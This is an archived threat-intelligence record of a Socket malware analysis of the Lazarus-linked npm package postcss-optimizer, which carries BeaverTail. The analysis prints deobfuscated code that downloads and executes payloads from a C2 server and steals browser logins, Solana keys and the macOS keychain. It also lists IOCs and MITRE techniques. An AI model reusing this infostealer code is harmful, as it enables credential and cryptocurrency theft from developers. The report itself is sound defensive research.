{
	"id": "6469c489-c451-4000-bfec-a849fb9c7467",
	"created_at": "2026-04-06T00:10:53.410786Z",
	"updated_at": "2026-04-10T13:12:50.024631Z",
	"deleted_at": null,
	"sha1_hash": "fe8791279ae52236d3c9b8bc1361f02bf712c217",
	"title": "North Korean APT Lazarus Targets Developers with Malicious n...",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1567614,
	"plain_text": "North Korean APT Lazarus Targets Developers with Malicious n...\r\nArchived: 2026-04-05 14:42:48 UTC\r\nSocket researchers have discovered the malicious npm package postcss-optimizer, which contains code linked\r\nto previously documented campaigns conducted by North Korean state-sponsored threat actors known as\r\nContagious Interview, a subgroup within the broader Lazarus Advanced Persistent Threat (APT) group.\r\nThe malicious package, which has been downloaded 477 times, contains the BeaverTail malware, functioning as\r\nboth an infostealer and a loader. As a malware loader, BeaverTail is designed to deploy and execute a second-stage payload, which is likely the InvisibleFerret backdoor based on code similarities and a broader strategy\r\nemployed by the Democratic People’s Republic of Korea (DPRK).\r\nhttps://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package\r\nPage 1 of 9\n\nBy impersonating the legitimate postcss library, which has over 16 billion downloads, the threat actor aims to\r\ninfect developers’ systems with credential-stealing and data-exfiltration capabilities across Windows, macOS, and\r\nLinux systems. At the time of publication, the package remains live on npm, but we have petitioned the registry\r\nfor its removal.\r\nLazarus Goes Open Source#\r\nThe malicious package postcss-optimizer, published by a threat actor using the npm registry alias “yolorabbit”,\r\nis designed to closely mimic the legitimate postcss library. 
The high degree of similarity increases the\r\nlikelihood that a target may mistakenly install it, believing it to be the authentic package.\r\nA screenshot of the legitimate postcss package on the npm registry.\r\nA screenshot of the malicious postcss-optimizer package on the npm registry.\r\nAccording to Palo Alto Networks Unit 42 researchers, who originally identified Contagious Interview-style\r\nattacks in 2022, the threat actor engages victims in a staged interview process to persuade them to download and\r\ninstall an npm-based package. The package is likely presented as software for review or analysis, but in reality, it\r\ncontains malicious JavaScript designed to infect the victim’s system with BeaverTail malware.\r\nIn the incident discovered by Socket researchers, the threat actor infiltrated the npm registry with a malicious\r\npackage containing BeaverTail malware — an attack that closely resembles findings from Unit 42. Once installed\r\non a host system, the malware follows a structured multi-stage process to establish persistence, exfiltrate sensitive\r\ndata, and facilitate further compromise.\r\nPersistence is achieved through registry modifications or startup script injections on Windows, while on macOS\r\nand Linux, it relies on Python-based or shell script execution. The malware then exfiltrates sensitive data, such as\r\ncredentials, browser cookies, and local cryptocurrency wallet files by transmitting HTTP POST requests to a\r\ncommand and control (C2) server. Finally, it attempts to fetch and execute additional payloads, reinforcing long-term access and control over the compromised system. 
These tactics, techniques, and procedures (TTPs) align\r\nwith those previously observed in Lazarus-orchestrated software supply chain attacks.\r\nExploring BeaverTail’s Code#\r\nDespite the threat actor’s use of a JavaScript obfuscation tool to conceal the malicious code, Socket’s automated\r\nanalysis successfully detected and flagged the package as malicious. The obfuscation techniques included variable\r\nrenaming, string encoding, and control flow flattening, all designed to hinder static analysis and evade signature-based detection.\r\nSocket’s static and behavioral analysis also detected suspicious execution patterns, including shell command\r\nexecution, file system manipulation, and covert network communication. These indicators, combined with the\r\npackage’s resemblance to previously documented Lazarus-affiliated campaigns, led to its further classification as a\r\nhigh-risk threat.\r\nSocket AI Scanner’s analysis, including contextual details about the malicious postcss-optimizer\r\npackage.\r\nThe following deobfuscated and redacted code snippets have been annotated to highlight the threat actor’s\r\ntechniques, including data exfiltration methods, and mechanisms for retrieving additional payloads.\r\n// Collect system information\r\nconst the_hostname = node_os.hostname(); // Get computer hostname\r\nconst the_platform = node_os.platform(); // Detect OS (Windows, Linux, macOS)\r\nconst the_homedir = node_os.homedir(); // Get user home directory\r\nconst the_tempdir = node_os.tmpdir(); // Get system temp directory\r\nThe provided JavaScript snippet collects key system information, as a part of an initial reconnaissance phase. 
It\r\nretrieves the system’s hostname using node_os.hostname() , which can be used for fingerprinting the infected\r\nmachine and tracking individual infections. The script also determines the operating system with\r\nnode_os.platform() , allowing the malware to tailor its execution based on whether the target is running\r\nWindows, Linux, or macOS. By accessing the user’s home directory via node_os.homedir() , the script positions\r\nitself to locate stored credentials, browser data, or cryptocurrency wallets, all of which are commonly targeted in\r\ninfostealer campaigns.\r\n// Hardcoded malicious server (C2)\r\nconst malicious_url = 'hxxp://91.92.120[.]132:80/client/xxx';\r\n// Determine platform and set execution method\r\nconst script_path = `${the_homedir}/.npl`;\r\nconst execute_script = platform_windows ? `\"${the_homedir}\\\\.pyp\\\\python.exe\" \"${script_path}\"` : `python3 \"${sc\r\n// Fetch and execute additional payload\r\nnode_request.get(malicious_url, (error, response, body) =\u003e {\r\n if (!error) {\r\n node_fs.writeFileSync(script_path, body);\r\n child_process_exec(execute_script);\r\nThe script determines the operating system of the infected machine and dynamically constructs an execution\r\nmethod based on whether the system is running Windows, Linux or macOS. It then contacts a hardcoded C2\r\nserver at hxxp://91.92.120[.]132:80/client/xxx to fetch an additional payload, which is subsequently written\r\nto disk and executed using either Python3 (on Unix-based systems) or a Python executable residing in a hidden\r\nuser directory on Windows.\r\nThe script’s functionality aligns closely with known behaviors of the BeaverTail malware and its associated\r\nsecond-stage malware, InvisibleFerret, as reported by Unit 42. 
This method was also observed in the eSentire\r\nanalysis, where BeaverTail leveraged cURL to download a Python executable for subsequent execution of\r\nInvisibleFerret, with the payload stored in an .npl script, mirroring the persistence mechanisms in the provided\r\nscript.\r\n// Hardcoded malicious URL for fetching the second-stage payload\r\nconst payload_url = 'hxxp://91.92.120[.]132:80/pdown';\r\n// Define paths for temporary storage of the downloaded payload\r\nconst pzi_filename = `${the_tempdir}/p.zi`; // Initial downloaded file\r\nconst p2zip_filename = `${the_tempdir}/p2.zip`; // Renamed file for extraction\r\n// Craft a cURL command to download the payload (used as an alternative execution method)\r\nconst curl_payload_command = `curl -Lo \"${the_tempdir}\\\\p.zi\" \"${payload_url}\"`;\r\nfunction download_main_payload() {\r\n node_request(payload_url, function (error, response, body) {\r\n if (!error) {\r\n // Write the downloaded payload to disk\r\n node_fs.writeFileSync(pzi_filename, body);\r\n \r\n // Rename the file, likely to evade detection or facilitate extraction\r\n node_fs.renameSync(pzi_filename, p2zip_filename);\r\n \r\n // Call function to extract and execute the payload\r\n unpackpayload(p2zip_filename);\r\nThe script first attempts to download the payload using node_request , saving it as p.zi in the system’s\r\ntemporary directory before renaming it to p2.zip , likely to bypass detection mechanisms or prepare it for\r\nextraction. 
If the direct request fails, the script includes a cURL command as a fallback, reinforcing its resilience\r\nagainst environmental restrictions.\r\nPrior analysis of Lazarus-associated npm attacks by DataDog and Phylum researchers indicates that exfiltrated\r\nfiles are transmitted to the /uploads endpoint, while the Python installation package is retrieved from /pdown,\r\na pattern also observed in the malicious postcss-optimizer package we analyzed.\r\nAccording to Unit 42’s research, BeaverTail often serves as a downloader, responsible for retrieving secondary-stage payloads, which in prior incidents included InvisibleFerret, a Python-based backdoor. The use of .zi-formatted files and staged renaming operations was also observed in eSentire’s analysis, where BeaverTail\r\nleveraged similar techniques to disguise and execute downloaded payloads. While network indicators and\r\nexecution patterns strongly suggest that InvisibleFerret was deployed as the second-stage payload, we were unable\r\nto retrieve a sample for direct analysis, as the C2 infrastructure ceased serving the payload prior to collection.\r\n// Hardcoded C2 URL for data exfiltration\r\nconst upload_url = 'hxxp://91.92.120[.]132:80/uploads';\r\n// Function to steal and exfiltrate browser credentials\r\nfunction steal_and_exfiltrate() {\r\n const paths = [\r\n `${the_homedir}/Library/Application Support/Google/Chrome/Login Data`,\r\n `${the_homedir}/Library/Application Support/BraveSoftware/Brave-Browser/Login Data`,\r\n `${the_homedir}/Library/Application Support/Firefox/logins.json`\r\n ];\r\n// Encoded browser extensions (crypto wallets targeted)\r\nconst crypto_wallet_extensions = [\r\n 'nkbihfbeogaeaoehlefnkodbefgpgknn', // MetaMask\r\n 'ejbalbakoplchlghecdalmeeeajnimhm', // Phantom\r\n 'fhbohimaelbohpjbbldcngcnapndodjp', // Binance Wallet\r\n'hnfanknocfeofbddgcijnmhnfnkdnaad' 
// Coinbase Wallet\r\n];\r\n// Function to steal Solana wallet credentials\r\nfunction steal_solana_wallet() {\r\n const solana_wallet_path = `${the_homedir}/.config/solana/id.json`; // Path to Solana private keys\r\n if (node_fs.existsSync(solana_wallet_path)) {\r\n try {\r\n const solana_wallet_data = node_fs.createReadStream(solana_wallet_path);\r\n const stolen_file = { filename: 'solana_id.txt', value: solana_wallet_data };\r\n exfiltrate_data([stolen_file]); // Send stolen private keys to C2 server\r\n// Function to steal macOS login keychain\r\nfunction steal_macos_keychain() {\r\n const keychain_paths = [\r\n `${the_homedir}/Library/Keychains/login.keychain`,\r\n `${the_homedir}/Library/Keychains/login.keychain-db`\r\n ];\r\n \r\n const stolen_files = paths\r\n .filter(path =\u003e node_fs.existsSync(path))\r\n .map(path =\u003e ({ filename: path.split('/').pop(), value: node_fs.createReadStream(path) }));\r\n if (stolen_files.length) {\r\n node_request.post({ url: upload_url, formData: { hid: the_hostname, multi_file: stolen_files } });\r\n }\r\n}\r\n// Execute credential theft and maintain persistence\r\nfunction main() {\r\n try {\r\n steal_and_exfiltrate();\r\n fetch_xxx_payload_awaited(); // Continue malicious execution\r\n } catch (err) {}\r\n}\r\nmain();\r\nsetInterval(main, 600000); // Re-run every 10 minutes to maintain persistence\r\nThe above code is designed to steal sensitive user data, including browser-stored credentials, Solana\r\ncryptocurrency wallet private keys, and macOS login keychain data, before exfiltrating them to a hardcoded C2\r\nserver at hxxp://91.92.120[.]132:80/uploads . 
It systematically searches for credential storage locations across\r\nGoogle Chrome, Brave, and Firefox, as well as the Solana wallet directory, extracting and transmitting any\r\ndiscovered files.\r\nAdditionally, the script includes a predefined list of browser extension IDs associated with cryptocurrency wallets,\r\nspecifically targeting MetaMask, Phantom, Binance Wallet, and Coinbase Wallet, indicating a clear intent to\r\nintercept and exfiltrate private keys and authentication tokens related to digital assets. The Solana-specific\r\nfunction directly accesses the id.json file, which contains private keys, reinforcing its focus on cryptocurrency\r\ntheft.\r\nMoreover, the script specifically targets macOS login keychain data by searching for login.keychain and\r\nlogin.keychain-db within the user’s Library directory, further expanding its credential theft capabilities.\r\nOnce the stolen data is prepared, it is sent to the C2 server using an HTTP POST request, with each stolen file\r\nlabeled based on its source. The script is designed for persistence, executing every 10 minutes to continuously\r\nexfiltrate newly collected credentials and financial data. This functionality closely aligns with previously\r\ndocumented Lazarus-affiliated BeaverTail malware, which was observed in multiple campaigns leveraging npm\r\npackages as an initial infection vector.\r\nOutlook and Recommendations#\r\nThe discovery of postcss-optimizer as a malicious npm package underscores the persistent threat that North\r\nKorean state-sponsored groups pose to the software supply chain. 
Even a single compromised development\r\nmachine can serve as an entry point for broader network infiltration, credential theft, and data exfiltration.\r\nLazarus-linked campaigns continue to demonstrate adaptability, leveraging open-source ecosystems like npm to\r\ndistribute malware under the guise of legitimate tools. Given the history of similar Lazarus campaigns, and the\r\nrecent malicious campaign, we expect continued iterations of this attack strategy, likely with refinements in\r\nobfuscation techniques and payload delivery mechanisms.\r\nTo mitigate these risks, developers and organizations must take proactive measures to secure their software supply\r\nchains. Regular dependency audits and automated scanning tools should be employed to detect anomalous or\r\nmalicious behaviors in third-party packages before they are integrated into production environments.\r\nSocket’s GitHub app enables real-time monitoring of pull requests, flagging suspicious or malicious packages\r\nbefore they are merged. Running the Socket CLI during npm installations or builds adds another layer of defense\r\nby identifying anomalies in open source dependencies before they reach production. Additionally, using the\r\nSocket browser extension provides on-the-fly protection by analyzing browsing activity and alerting users to\r\npotential threats before they download or interact with malicious content. 
By integrating these security measures\r\ninto development workflows, organizations can significantly reduce the likelihood of supply chain attacks.\r\nIndicators of Compromise (IOCs)#\r\nMalicious npm Package:\r\npostcss-optimizer\r\nC2 Infrastructure:\r\n91.92.120[.]132:80/client/xxx\r\n91.92.120[.]132:80/pdown\r\n91.92.120[.]132:80/uploads\r\nThreat Actor Identifiers:\r\nnpm username: yolorabbit\r\nemail used to register npm username: surprise.eng000@gmail.com\r\nMITRE ATT\u0026CK Techniques#\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nT1608.001 — Stage Capabilities: Upload Malware\r\nT1204.002 — User Execution: Malicious File\r\nT1059.007 — Command and Scripting Interpreter: JavaScript\r\nT1059.006 — Command and Scripting Interpreter: Python\r\nT1036.005 — Masquerading: Match Legitimate Name or Location\r\nT1027.013 — Obfuscated Files or Information: Encrypted/Encoded File\r\nT1546.016 — Event Triggered Execution: Installer Packages\r\nT1048 — Exfiltration Over Alternative Protocol\r\nT1583.006 — Acquire Infrastructure: Web Services\r\nT1005 — Data from Local System\r\nT1082 — System Information Discovery\r\nT1083 — File and Directory Discovery\r\nT1217 — Browser Information Discovery\r\nT1555.003 — Credentials from Password Stores: Credentials from Web Browsers\r\nT1555.001 — Credentials from Password Stores: Keychain\r\nT1547.001 — Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1071.001 — Application Layer Protocol: Web Protocols\r\nT1041 — Exfiltration Over C2 Channel\r\nT1105 — Ingress Tool Transfer\r\nT1119 — Automated Collection\r\nT1657 — Financial Theft\r\nSource: https://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package"
	],
	"report_names": [
		"north-korean-apt-lazarus-targets-developers-with-malicious-npm-package"
	],
	"threat_actors": [
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434253,
	"ts_updated_at": 1775826770,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fe8791279ae52236d3c9b8bc1361f02bf712c217.pdf",
		"text": "https://archive.orkl.eu/fe8791279ae52236d3c9b8bc1361f02bf712c217.txt",
		"img": "https://archive.orkl.eu/fe8791279ae52236d3c9b8bc1361f02bf712c217.jpg"
	}
}